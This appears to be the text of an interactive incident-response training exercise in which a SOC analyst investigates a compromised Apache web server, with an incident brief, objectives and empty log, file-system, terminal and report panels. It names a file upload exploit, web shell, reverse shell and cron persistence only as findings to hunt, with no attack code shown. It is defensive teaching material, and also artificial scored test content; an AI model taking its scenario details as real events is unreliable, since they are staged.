⚠ IDS ALERT — WEB SERVER COMPROMISE — webserver-01
IR-07
INCIDENT RESPONSE — WEB SERVER COMPROMISE
FILE UPLOAD EXPLOIT · WEB SHELL · REVERSE SHELL · CRON PERSISTENCE
Loading server artifacts...

OBJECTIVES

Read the incident ticket
Find the attacker's IP in access logs
Identify the vulnerability exploited
Find the web shell filename
View the web shell source code
Find the SSH brute-force in auth logs
Identify the persistence mechanism
Look up attacker IP in threat intel
Run terminal investigation commands
Submit the IR report
📜
Apache Access Log
🗂️
File System
🔐
Auth Log
Cron Inspector
🛡️
Threat Intel
💻
Terminal
📝
Notepad
📄
IR Report
SOC ANALYST
Apache Log
File System
Auth Log
Cron
Threat Intel
Terminal
Notepad
IR Report
--:--:--
PHASE 1 — TRIAGE
INCIDENT BRIEF
⚠ IDS ALERT — TICKET #IR-2026-0512

WEB SERVER COMPROMISE

HOST: webserver-01 · 192.168.10.5 · 07:22 UTC

INCIDENT SUMMARY

The IDS fired at 07:22 UTC flagging unusual outbound traffic from webserver-01, the company's public-facing Apache web server. A junior admin noticed an unknown file in the web root and elevated the alert. The server hosts the company's customer portal on Ubuntu 22.04 with Apache 2.4.

SERVER DETAILS

PropertyValue
Hostnamewebserver-01
Internal IP192.168.10.5
Public IP203.0.113.15
OSUbuntu 22.04 LTS
Web ServerApache 2.4.52
Web Root/var/www/html/

INITIAL OBSERVATIONS

  • Unknown PHP file found in /var/www/html/uploads/
  • Outbound connection to unknown external IP on port 4444
  • CPU spike between 06:40–07:10 UTC
  • Multiple SSH failures in auth log overnight

YOUR TASKS

  • Search Apache access logs for scanner activity, file uploads, and web shell usage
  • Browse the file system to find and inspect the web shell
  • Review auth logs for SSH brute-force activity
  • Check cron jobs for persistence
  • Look up the attacker IP in threat intel
  • Run terminal investigation commands
  • Complete the IR Report
APACHE ACCESS LOG — /var/log/apache2/access.log — 2026-05-08
0 entries
IPTimeMethPathCodeBytes
REQUEST DETAIL
Click a log entry to inspect it
FILE SYSTEM — webserver-01 — /var/www/html/
Name
Perms
Modified
Size
Owner
AUTH LOG — /var/log/auth.log — 2026-05-08
0 entries
TimeHostServiceMessage
EVENT DETAIL
Click an entry to inspect
CRON INSPECTOR — webserver-01
THREAT INTELLIGENCE — IOC LOOKUP
LOOK UP IP, DOMAIN, OR FILE HASH
Enter the attacker's IP or file hash
found in your investigation.
TERMINAL — analyst@webserver-01:~$
analyst@webserver-01:~$ # Connected via secure channel
analyst@webserver-01:~$ # Type "help" for available commands
analyst@webserver-01:~$
NOTEPAD — IR SCRATCHPAD
IR REPORT — TICKET #IR-2026-0512
INITIAL ACCESS
POST-EXPLOITATION
SCOPE & SEVERITY
Score: 0 / 8